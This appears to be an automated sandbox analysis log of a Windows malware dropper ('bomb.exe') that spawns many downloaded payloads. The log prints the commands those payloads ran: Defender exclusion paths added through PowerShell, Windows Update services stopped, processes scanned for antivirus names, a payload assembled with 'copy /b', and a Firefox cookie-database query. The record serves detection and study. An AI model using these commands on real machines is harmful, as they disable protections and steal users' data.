Source: C:\Users\user\Desktop\httpjask.powerforxes.shoprevada66af9bdbf0f60_team.exe.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\httpjask.powerforxes.shoprevada66af9bdbf0f60_team.exe.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\httpjask.powerforxes.shopyuop66f6b9bd7a566_784865439765.exe#ss.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\httpjask.powerforxes.shopyuop66f6b9bd7a566_784865439765.exe#ss.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Source: bomb.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process

Source: C:\Users\user\Desktop\bomb.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\bomb.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: MSBuild.exe, 00000008.00000002.3090602331.0000000001568000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies;I
Source: MSBuild.exe, 00000008.00000002.3300165687.0000000033EFF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: MSBuild.exe, 00000008.00000002.3252838102.000000001C34E000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.3226573239.00000000044A8000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.3314425570.000000003FDDF000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.3374099953.0000000067D0F000.00000002.00000001.01000000.0000001C.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: MSBuild.exe, 00000008.00000002.3300165687.0000000033EFF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: MSBuild.exe, 00000008.00000002.3252838102.000000001C34E000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.3226573239.00000000044A8000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.3314425570.000000003FDDF000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.3374099953.0000000067D0F000.00000002.00000001.01000000.0000001C.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: MSBuild.exe, 00000008.00000002.3252838102.000000001C34E000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.3226573239.00000000044A8000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.3314425570.000000003FDDF000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.3374099953.0000000067D0F000.00000002.00000001.01000000.0000001C.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: MSBuild.exe, 00000008.00000002.3252838102.000000001C34E000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.3226573239.00000000044A8000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.3314425570.000000003FDDF000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.3374099953.0000000067D0F000.00000002.00000001.01000000.0000001C.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: MSBuild.exe, 00000008.00000002.3300165687.0000000033EFF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: MSBuild.exe, 00000008.00000002.3252838102.000000001C34E000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.3226573239.00000000044A8000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
Source: MSBuild.exe, 00000008.00000002.3300165687.0000000033EFF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: MSBuild.exe, 00000008.00000002.3300165687.0000000033EFF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: MSBuild.exe, 00000008.00000002.3300165687.0000000033EFF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: MSBuild.exe, 00000008.00000002.3252838102.000000001C34E000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.3226573239.00000000044A8000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
Source: MSBuild.exe, 00000008.00000002.3300165687.0000000033EFF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: MSBuild.exe, MSBuild.exe, 00000008.00000002.3252838102.000000001C34E000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.3226573239.00000000044A8000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.3314425570.000000003FDDF000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.3374099953.0000000067D0F000.00000002.00000001.01000000.0000001C.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: MSBuild.exe, 00000008.00000002.3252838102.000000001C34E000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.3226573239.00000000044A8000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.3314425570.000000003FDDF000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.3374099953.0000000067D0F000.00000002.00000001.01000000.0000001C.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: MSBuild.exe, 00000008.00000002.3300165687.0000000033EFF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: MSBuild.exe, 00000008.00000002.3252838102.000000001C34E000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.3226573239.00000000044A8000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
Source: MSBuild.exe, 00000008.00000002.3252838102.000000001C34E000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.3226573239.00000000044A8000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: MSBuild.exe, 00000008.00000002.3300165687.0000000033EFF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: MSBuild.exe, 00000008.00000002.3252838102.000000001C34E000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.3226573239.00000000044A8000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: MSBuild.exe, 00000008.00000002.3300165687.0000000033EFF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: bomb.exe	ReversingLabs: Detection: 65%
Source: bomb.exe	Virustotal: Detection: 78%

Source: C:\Users\user\Desktop\bomb.exe

File read: C:\Users\user\Desktop\bomb.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\bomb.exe "C:\Users\user\Desktop\bomb.exe"
Source: C:\Users\user\Desktop\bomb.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\bomb.exe	Process created: C:\Users\user\Desktop\http185.215.113.66pei.exe.exe "C:\Users\user\Desktop\http185.215.113.66pei.exe.exe"
Source: C:\Users\user\Desktop\bomb.exe	Process created: C:\Users\user\Desktop\http185.215.113.66newtpp.exe.exe "C:\Users\user\Desktop\http185.215.113.66newtpp.exe.exe"
Source: C:\Users\user\Desktop\bomb.exe	Process created: C:\Users\user\Desktop\httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe "C:\Users\user\Desktop\httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe"
Source: C:\Users\user\Desktop\bomb.exe	Process created: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe "C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe"
Source: C:\Users\user\Desktop\httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\Desktop\httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: C:\Users\user\Desktop\bomb.exe	Process created: C:\Users\user\Desktop\http77.105.161.194file1.exe.exe "C:\Users\user\Desktop\http77.105.161.194file1.exe.exe"
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 7112 -ip 7112
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Users\user\Desktop\httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7112 -s 280
Source: C:\Users\user\Desktop\http77.105.161.194file1.exe.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Tits Tits.bat & Tits.bat
Source: C:\Users\user\Desktop\http185.215.113.66newtpp.exe.exe	Process created: C:\Windows\sysvplervcs.exe C:\Windows\sysvplervcs.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\bomb.exe	Process created: C:\Users\user\Desktop\httpmales.mugutu.comrevada66df29a06624c_cry.exe.exe "C:\Users\user\Desktop\httpmales.mugutu.comrevada66df29a06624c_cry.exe.exe"
Source: C:\Users\user\Desktop\httpmales.mugutu.comrevada66df29a06624c_cry.exe.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\httpmales.mugutu.comrevada66df29a06624c_cry.exe.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Desktop\http185.215.113.66pei.exe.exe	Process created: C:\Users\user\AppData\Local\Temp\323057790.exe C:\Users\user\AppData\Local\Temp\323057790.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Users\user\AppData\Local\Temp\323057790.exe	Process created: C:\Users\user\sysvplervcs.exe C:\Users\user\sysvplervcs.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 400445
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "navyfurthermoreacceptableinvestigator" Profession
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Atmospheric + ..\Commons + ..\Represent + ..\Humans + ..\Href + ..\Router + ..\Connection + ..\Sol O
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\400445\Batch.pif Batch.pif O
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\sysvplervcs.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\sysvplervcs.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\sc.exe sc stop UsoSvc
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: unknown	Process created: C:\Windows\sysvplervcs.exe "C:\Windows\sysvplervcs.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\sc.exe sc stop WaaSMedicSvc
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\sc.exe sc stop wuauserv
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\sc.exe sc stop DoSvc
Source: C:\Users\user\Desktop\bomb.exe	Process created: C:\Users\user\Desktop\httpjask.powerforxes.shoprevada66af9bdbf0f60_team.exe.exe "C:\Users\user\Desktop\httpjask.powerforxes.shoprevada66af9bdbf0f60_team.exe.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\sc.exe sc stop BITS /wait
Source: unknown	Process created: C:\Users\user\sysvplervcs.exe "C:\Users\user\sysvplervcs.exe"
Source: C:\Users\user\Desktop\bomb.exe	Process created: C:\Users\user\Desktop\httpjask.powerforxes.shoplopsa66dc99a997229_VirtualLibrary.exe.exe "C:\Users\user\Desktop\httpjask.powerforxes.shoplopsa66dc99a997229_VirtualLibrary.exe.exe"
Source: C:\Users\user\Desktop\bomb.exe	Process created: C:\Users\user\Desktop\httpmales.mugutu.comyuop66bf353c38733_Grids.exe.exe "C:\Users\user\Desktop\httpmales.mugutu.comyuop66bf353c38733_Grids.exe.exe"
Source: C:\Users\user\Desktop\bomb.exe	Process created: C:\Users\user\Desktop\httpjask.powerforxes.shopyuop66f6b9bd7a566_784865439765.exe#ss.exe "C:\Users\user\Desktop\httpjask.powerforxes.shopyuop66f6b9bd7a566_784865439765.exe#ss.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\bomb.exe	Process created: C:\Users\user\Desktop\http185.215.113.66pei.exe.exe "C:\Users\user\Desktop\http185.215.113.66pei.exe.exe"	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Process created: C:\Users\user\Desktop\http185.215.113.66newtpp.exe.exe "C:\Users\user\Desktop\http185.215.113.66newtpp.exe.exe"	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Process created: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe "C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe"	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Process created: C:\Users\user\Desktop\httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe "C:\Users\user\Desktop\httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe"	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Process created: C:\Users\user\Desktop\http77.105.161.194file1.exe.exe "C:\Users\user\Desktop\http77.105.161.194file1.exe.exe"	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Process created: C:\Users\user\Desktop\httpmales.mugutu.comrevada66df29a06624c_cry.exe.exe "C:\Users\user\Desktop\httpmales.mugutu.comrevada66df29a06624c_cry.exe.exe"	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Process created: C:\Users\user\Desktop\httpjask.powerforxes.shoprevada66af9bdbf0f60_team.exe.exe "C:\Users\user\Desktop\httpjask.powerforxes.shoprevada66af9bdbf0f60_team.exe.exe"	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Process created: C:\Users\user\Desktop\httpjask.powerforxes.shoplopsa66dc99a997229_VirtualLibrary.exe.exe "C:\Users\user\Desktop\httpjask.powerforxes.shoplopsa66dc99a997229_VirtualLibrary.exe.exe"	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Process created: C:\Users\user\Desktop\httpmales.mugutu.comyuop66bf353c38733_Grids.exe.exe "C:\Users\user\Desktop\httpmales.mugutu.comyuop66bf353c38733_Grids.exe.exe"	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Process created: C:\Users\user\Desktop\httpjask.powerforxes.shopyuop66f6b9bd7a566_784865439765.exe#ss.exe "C:\Users\user\Desktop\httpjask.powerforxes.shopyuop66f6b9bd7a566_784865439765.exe#ss.exe"	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 400445	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\http185.215.113.66pei.exe.exe	Process created: C:\Users\user\AppData\Local\Temp\323057790.exe C:\Users\user\AppData\Local\Temp\323057790.exe	Jump to behavior
Source: C:\Users\user\Desktop\http185.215.113.66newtpp.exe.exe	Process created: C:\Windows\sysvplervcs.exe C:\Windows\sysvplervcs.exe	Jump to behavior
Source: C:\Users\user\Desktop\httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Users\user\Desktop\httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 7112 -ip 7112
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7112 -s 280
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Users\user\Desktop\http77.105.161.194file1.exe.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Tits Tits.bat & Tits.bat
Source: C:\Windows\SysWOW64\WerFault.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 400445
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "navyfurthermoreacceptableinvestigator" Profession
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Atmospheric + ..\Commons + ..\Represent + ..\Humans + ..\Href + ..\Router + ..\Connection + ..\Sol O
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\400445\Batch.pif Batch.pif O
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\Desktop\httpmales.mugutu.comrevada66df29a06624c_cry.exe.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\323057790.exe	Process created: C:\Users\user\sysvplervcs.exe C:\Users\user\sysvplervcs.exe
Source: C:\Users\user\sysvplervcs.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
Source: C:\Users\user\sysvplervcs.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait
Source: C:\Users\user\sysvplervcs.exe	Process created: unknown unknown
Source: C:\Users\user\sysvplervcs.exe	Process created: unknown unknown
Source: C:\Users\user\sysvplervcs.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\sc.exe sc stop UsoSvc
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\sc.exe sc stop WaaSMedicSvc
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\sc.exe sc stop wuauserv
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\sc.exe sc stop DoSvc
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\sc.exe sc stop BITS /wait
Source: C:\Users\user\Desktop\httpjask.powerforxes.shoplopsa66dc99a997229_VirtualLibrary.exe.exe	Process created: unknown unknown
Source: C:\Users\user\Desktop\httpmales.mugutu.comyuop66bf353c38733_Grids.exe.exe	Process created: unknown unknown
Source: C:\Users\user\Desktop\httpjask.powerforxes.shopyuop66f6b9bd7a566_784865439765.exe#ss.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\bomb.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Section loaded: schannel.dll	Jump to behavior
